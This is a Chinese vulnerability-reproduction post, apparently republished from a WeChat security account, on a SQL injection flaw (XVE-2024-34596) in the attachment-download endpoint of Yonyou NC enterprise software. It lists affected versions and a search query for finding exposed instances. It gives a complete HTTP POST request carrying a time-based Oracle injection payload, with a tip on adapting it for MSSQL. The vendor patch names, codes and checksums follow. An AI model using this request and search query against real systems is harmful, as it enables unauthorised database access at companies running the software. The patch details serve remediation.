用友NC(也称用友NC6或NCC)是用友网络科技股份有限公司开发的一款企业级管理软件,旨在为企业提供全方位的管理服务。主要面向大型企业和集团公司,提供全面的财务和业务管理解决方案,助力企业实现数字化转型和高效管理。采用J2EE架构和先进开放的集团级开发平台UAP,融合了云计算技术、移动应用技术等最新互联网技术,形成了集团管控8大领域15大行业68个细分行业的解决方案。凭借其全面的功能、强大的集成能力和高度的可定制化,成为许多大型企业和集团公司进行财务和业务管理的首选工具。
影响范围:
NC63、NC633、NC65
app="用友-UFIDA-NC"
POST/portal/pt/yerfile/down/bill?pageId=login HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101Firefox/132.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Connection: close
id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),4)--
PS:数据库分为mssql和oracle 自行调整payload
延时
NC63方案
补丁名称:patch_63-网报-附件下载SQL注入问题处理
补丁编码:NCM_NC6.3_000_109902_20240522_GP_371181203
校验码:
c1cac33f9f57dce91da1cdb47a72f11884f3ad9920a07aee4ffffb2e647e5250
NC633方案
补丁名称:patch_633-网报-附件下载SQL注入问题处理
补丁编码:NCM_NC6.33_000_109902_20240522_GP_371301857
校验码:
cfe23eda55de7e874adacc0b7722144a80cba7b2ae778f7d77ce9cc60f16481e
NC65方案
补丁名称:patch_65-网报-附件下载SQL注入问题处理
补丁编码:NCM_NC6.5_000_109902_20240522_GP_371338574
校验码:
f3b01ab8e65cab2c29df3dee4143afc1432819733d5142a971e50fc7928ba432
原文始发于微信公众号(冷漠安全):「漏洞复现」用友NC yerfile/down SQL注入漏洞(XVE-2024-34596)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论